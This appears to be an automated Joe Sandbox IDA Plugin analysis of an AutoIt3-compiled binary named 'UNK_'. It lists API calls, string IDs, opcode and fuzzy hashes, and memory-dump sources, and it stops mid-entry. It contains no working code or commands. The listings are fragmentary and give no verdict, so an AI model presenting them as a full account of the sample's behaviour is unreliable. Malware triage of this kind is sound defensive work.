                                                                                                                  • Opcode Fuzzy Hash: fc4c6415c31d8e83c843a10806046a0d4a0ad192214c24ee8f17f88234247d68
                                                                                                                  • Instruction Fuzzy Hash: 6CE0ED31500380AEEB216F75EC4D7A83B23AB56336F18C266FA69981E6C7714541DB31
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: 025a6067d65d71901ce2a071c5923d0f831f3238438c04611e370974f48b3ce5
                                                                                                                  • Instruction ID: cbb72631179145dd91000cc73ae5250f9d5b08bb816c3a2c4f2bacc4099a0f3d
                                                                                                                  • Opcode Fuzzy Hash: 025a6067d65d71901ce2a071c5923d0f831f3238438c04611e370974f48b3ce5
                                                                                                                  • Instruction Fuzzy Hash: 46E07EB5540308EFDB006F609848A697BAAEB48361F15C815F98ACB351DAB599819B60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: b649240f9b437087bcf379e038050bfdba954a266c8909668932b60277e53d6b
                                                                                                                  • Instruction ID: 62d5cd2377e69f66a7f3af8c7318ea3a902872df72167f6551661807c21f9564
                                                                                                                  • Opcode Fuzzy Hash: b649240f9b437087bcf379e038050bfdba954a266c8909668932b60277e53d6b
                                                                                                                  • Instruction Fuzzy Hash: D6E092B5540308AFDB006F709C4C6697BABEB48361F15C415F94ACB351DAB99981CB60
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: >$DEFINE
                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                  • Opcode ID: 6fa841ccabd90fe9518e0bc74456af77624e8154fbbf919fff6e4e920414ec73
                                                                                                                  • Instruction ID: 7e7c63f38c46d57810b3b445758d5c853b1c6f25e843cb2357895763aff5ef7d
                                                                                                                  • Opcode Fuzzy Hash: 6fa841ccabd90fe9518e0bc74456af77624e8154fbbf919fff6e4e920414ec73
                                                                                                                  • Instruction Fuzzy Hash: 8B124975A0020ADFCB24CF58C4906BDBBB1FF48314F1AC15AE959AB351E770EA81CB60
                                                                                                                  APIs
                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00DAECA0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContainedObject
                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                  • Opcode ID: 56aab45bf0fa76b9aa395dad74642206ead3bf53fa551c37c2c9f17d47b77d34
                                                                                                                  • Instruction ID: 35b3eb1043a47603891a743eeb2e0d09df438b1fab182d75e47dfc2315adf04b
                                                                                                                  • Opcode Fuzzy Hash: 56aab45bf0fa76b9aa395dad74642206ead3bf53fa551c37c2c9f17d47b77d34
                                                                                                                  • Instruction Fuzzy Hash: 6F912774600701AFDB14DF64C885B6ABBF5FF49710F24856DE94ADB291DBB0E841CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • __wcsnicmp.LIBCMT ref: 00DBE785
                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DBE84E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                  • String ID: LPT
                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                  • Opcode ID: 13318157f2604586044c780bc9b2aa6930aab94744344e8a3d1fdd0fdaa8696e
                                                                                                                  • Instruction ID: ecc1232e50adf762ee8d1e6913ed43cfe874cca653200635585895c707b3dc25
                                                                                                                  • Opcode Fuzzy Hash: 13318157f2604586044c780bc9b2aa6930aab94744344e8a3d1fdd0fdaa8696e
                                                                                                                  • Instruction Fuzzy Hash: 41616F75A00615EFCB14DB94C895EEEB7B5EF48310F04806AF546AB290EB70EE40DB71
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00D71B83
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00D71B9C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                  • Opcode ID: ca589f2b3d6aba23cf0ff7f9d0cdc5f45ea61c102531aae5f805f440a20181cc
                                                                                                                  • Instruction ID: 8551f5f5e464a7e795dc13746aa46f170f6cde1ab7fce591eda8756b3df1f470
                                                                                                                  • Opcode Fuzzy Hash: ca589f2b3d6aba23cf0ff7f9d0cdc5f45ea61c102531aae5f805f440a20181cc
                                                                                                                  • Instruction Fuzzy Hash: EA514571408744ABE320AF14D886BABBBECFF98354F81484DF2C8410A6EB71956DC762
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7417D: __fread_nolock.LIBCMT ref: 00D7419B
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                  • String ID: FILE
                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                  • Opcode ID: 3f59f93adf93e5e03f408e8f8c7b6ea401655216219660463691998a410bcf18
                                                                                                                  • Instruction ID: 6f486c8a8c49e34e991b88c7378db4d43ffad450a7bc60dc60c9e9ee73344679
                                                                                                                  • Opcode Fuzzy Hash: 3f59f93adf93e5e03f408e8f8c7b6ea401655216219660463691998a410bcf18
                                                                                                                  • Instruction Fuzzy Hash: C741A432A10219BADF11ABA4CC41FEF7BBAEF89710F004469F615A7191DB719A448B70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DDA668
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DDA67D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: '
                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                  • Opcode ID: 89878f66134e0a31ff9d43209afc8827e0c2dc4bce481d626c735247ceb9a711
                                                                                                                  • Instruction ID: 7739ef462b4efc47d1a084434b76d1bf4d467ef9931ddd5e9a5268a29700f462
                                                                                                                  • Opcode Fuzzy Hash: 89878f66134e0a31ff9d43209afc8827e0c2dc4bce481d626c735247ceb9a711
                                                                                                                  • Instruction Fuzzy Hash: 4241E375A00209DFDB14CFA9D881BDA7BB9FB09300F14846AE909EB381D770E945CFA1
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DC57E7
                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00DC581D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                  • String ID: |
                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                  • Opcode ID: a0fdeef25f19198e23f3e05aa4e1bf014362c00517a51c61e187792f3d7a390a
                                                                                                                  • Instruction ID: 1977d82a56d873e19ddd29af90523ba65c9a456ddc05b85f4dd6aac390cd273a
                                                                                                                  • Opcode Fuzzy Hash: a0fdeef25f19198e23f3e05aa4e1bf014362c00517a51c61e187792f3d7a390a
                                                                                                                  • Instruction Fuzzy Hash: 19313D7180021AEBCF11AFA1DC55EEE7FB9FF18350F108019F815A6165EB319956DB70
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00DD961B
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DD9657
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                  • Opcode ID: 2706f3531a5710862cb1d15d0bf9e04cfa4aaa30acd56a559ed63c04936813a2
                                                                                                                  • Instruction ID: 0adac49cb1d2341627e342ada74b76f22aea75777ef1f83156b212d4c1f1008a
                                                                                                                  • Opcode Fuzzy Hash: 2706f3531a5710862cb1d15d0bf9e04cfa4aaa30acd56a559ed63c04936813a2
                                                                                                                  • Instruction Fuzzy Hash: E2319E31500604AEEB109F64DC91FBBB7A9FF58764F04961AF9A9C7290CA31AC81DB74
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5BE4
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DB5C1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: 2ba334b174c37849e60cfd13b003da14502fb71895850071eb2fa5d9beb8a990
                                                                                                                  • Instruction ID: 986cea605494874e22d99922934698405c4ebdc9fe83dced52ca0290b1944db7
                                                                                                                  • Opcode Fuzzy Hash: 2ba334b174c37849e60cfd13b003da14502fb71895850071eb2fa5d9beb8a990
                                                                                                                  • Instruction Fuzzy Hash: FD318231500709EBDB248F99E985BEEBFF6EF05350F1C4019E986961A4D7B09944CB30
                                                                                                                  APIs
                                                                                                                  • __snwprintf.LIBCMT ref: 00DC6BDD
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                  • Opcode ID: fa241d19711cc96fbacf906d4a892e37ee7e4fd93fc263c2030f92220853328c
                                                                                                                  • Instruction ID: 0cf74205edc1bdff5c7ccf78e60efbef3cbbf26f1522a31d7c27889a69e249c6
                                                                                                                  • Opcode Fuzzy Hash: fa241d19711cc96fbacf906d4a892e37ee7e4fd93fc263c2030f92220853328c
                                                                                                                  • Instruction Fuzzy Hash: 85218E31600219AECF11EFA4D982EAEBBB5EF44700F044469F549A7181EB74EA41DB71
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DD9269
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DD9274
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  • Opcode ID: cba591586eb2f217695e0cb6d8feac54e8c7d3ae9e37e8c4b1fa1d1004094dea
                                                                                                                  • Instruction ID: d62e11239b5036d297b0fde6c4f8595d166a4c343f30e4595f8f21c84dabedc1
                                                                                                                  • Opcode Fuzzy Hash: cba591586eb2f217695e0cb6d8feac54e8c7d3ae9e37e8c4b1fa1d1004094dea
                                                                                                                  • Instruction Fuzzy Hash: 1C11B671300208BFEF119F54DC91EBB7B6AEB893A4F544126F91897390D632DC518BB4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DD9775
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00DD978F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                  • Opcode ID: 27168295220f8122b592f68ff131e2024839a2d91b6c45469dff39cf4c98f17e
                                                                                                                  • Instruction ID: 6a5d33340d31e95f338ecd39f28c3a9736d22094db2582e08165c30bdcbd7eb8
                                                                                                                  • Opcode Fuzzy Hash: 27168295220f8122b592f68ff131e2024839a2d91b6c45469dff39cf4c98f17e
                                                                                                                  • Instruction Fuzzy Hash: DB113772520209AFDB04DFB8DC46EFABBB9EB08314F045629F956E3250E735E851DB60
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00DD94A6
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DD94B5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
